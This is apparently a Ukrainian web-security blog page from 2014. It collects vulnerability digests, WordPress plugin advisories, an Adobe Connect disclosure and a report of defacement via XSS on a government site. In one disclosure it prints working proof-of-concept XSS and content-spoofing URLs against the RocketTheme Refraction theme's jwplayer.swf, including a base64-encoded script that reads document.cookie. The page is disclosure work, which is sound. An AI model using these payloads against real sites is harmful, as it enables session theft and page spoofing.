Websecurity - Веб безпека

В ніч з четверга на п’ятницю, 02.10.2014, Українські Кібер Війська звернулися до Петра Олексійовича Порошенка. Звернення Українських Кібер Військ було розміщене на сайті Державної служби зайнятості. Стосовно звільнення Гелетея з посади Міністра Оборони України.

Саме звернення розмістили через XSS уразливість на dcz.gov.ua. На цьому сайті я виявив дві Cross-Site Scripting уразливості.

Раніше я вже писав про уразливості на kvs.gov.ua, dcz.gov.ua та kmu.gov.ua.

Ось демонстрація звернення.

В даній добірці уразливості в веб додатках:

• CyberArk User Enumeration - Multiple vulnerabilities (деталі)
• XSS in InterWorx Web Control Panel <= 5.0.12 (деталі)
• Vulnerability in phpMyAdmin (деталі)
• Cross-site Scripting in Telligent Evolution (деталі)
• AVTECH DVR multiple vulnerabilities (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах All In One Carousel, Post To PDF та Widget Control. Для котрих з’явилися експлоіти. All In One Carousel - це плагін для ротації банерів, Post To PDF - це плагін для публікації в формат PDF, Widget Control - це плагін для керування віджетами.

• Wordpress all_in_one_carousel Plugin XSS, CSRF Vuln (деталі)
• WordPress Post To PDF 2.3.1 Cross Site Scripting (деталі)
• WordPress Widget Control 1.0.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Synology DSM multiple vulnerabilities (деталі)
• Critical security flaws in Nagios NRPE client/server crypto (деталі)
• Open Web Analytics Pre-Auth SQL Injection (деталі)
• phpMyBackupPro-2.4 Cross-Site Scripting vulnerability (деталі)
• HP Intelligent Management Center (iMC), HP IMC Branch Intelligent Management System Software Module (BIMS), and Comware Based Switches and Routers, Remote Code Execution, Disclosure of Information (деталі)

Раніше я вже писав про численні уразливості в численних темах для WordPress виробництва RocketTheme. Окрім тем цих розробників я виявив подібні уразливості в багатьох темах інших розробників (в тому числі в custom темах).

Інформую про Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темі Refraction для WordPress. Розробленої RocketTheme.

Папка теми може називатися refraction або rt_refraction_wp.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Ця XSS уразливість є лише в нових версіях теми з 5.x версією JW Player:

http://site/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf?playerready=alert(document.cookie)

Content Spoofing (WASC-12):

http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

В папці http://site/wp-content/themes/refraction/ (http://site/wp-content/themes/rt_refraction_wp/) в index.php та багатьох інших php-файлах теми є FPD, що спрацьовують при налаштуваннях PHP по замовчуванню.

Уразливі всі версії теми Refraction для WordPress.

В даній добірці уразливості в веб додатках:

• EMC Atmos Unauthenticated Database Access Vulnerability (деталі)
• FreePBX 2.9 through 12 RCE (деталі)
• Mybb All Version Denial of Service Vulnerability (деталі)
• Reflected XSS vulnerability in Boxcryptor (деталі)
• HP Intelligent Management Center(iMC) and HP IMC Service Operation Management Software Module, Remote Authentication Bypass, Disclosure of Information, Unauthorized Access, SQL Injection (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах EasyMedia Gallery, Thank You Counter Button та Zedity. Для котрих з’явилися експлоіти. EasyMedia Gallery - це плагін для створення медіа галерей, Thank You Counter Button - це плагін для додавання кнопки “Thank You” з рахівником натискань, Zedity - це візуальний текстовий редактор.

• WordPress EasyMedia Gallery 1.2.29 Cross Site Scripting (деталі)
• WordPress Thanks You Counter Button 1.8.7 Cross Site Scripting (деталі)
• WordPress Zedity 2.4.0 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Adtran Netvanta Remote Code Injection via XSS (деталі)
• SQL injection and persistent XSS in the Typo3 3rd party extension si_bibtex (деталі)
• CGILua session.lua Predictable Session ID Vulnerability (деталі)
• Phpbb Forum Denial of Service Vulnerability (деталі)
• Denial of service vulnerability in Citrix NetScaler (деталі)

10.05.2014

У лютому, 15.02.2014, я виявив численні уразливості в Adobe Acrobat Connect Pro. Цей додаток раніше був відомий як Macromedia Breeze, а зараз зветься Adobe Connect. Це Brute Force, Cross-Site Request Forgery, Cross-Site Scripting та Redirector уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно програм Adobe, в яких я знаходив дірки, раніше я писав про DoS уразливість в Adobe Flash.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

20.09.2014

Brute Force (WASC-11):

http://server.webinar.ua/system/login

В формі логіна немає захисту від BF атак.

Cross-Site Request Forgery (WASC-09):

http://server.webinar.ua/system/login

В формі логіна немає захисту від CSRF атак. Також в цьому функціоналі є XSS і Redirector уразливості.

В даній добірці уразливості в веб додатках:

• HP ArcSight Enterprise Security Manager Management Web Interface, Remote Cross Site Scripting (XSS) (деталі)
• Cross-site scripting (XSS) vulnerability in Videowhisper (деталі)
• drupal6 security update (деталі)
• drupal7 security update (деталі)
• HP IceWall SSO, IceWall File Manager and IceWall Federation Agent, Multiple Remote Unauthorized Access Vulnerabilities (деталі)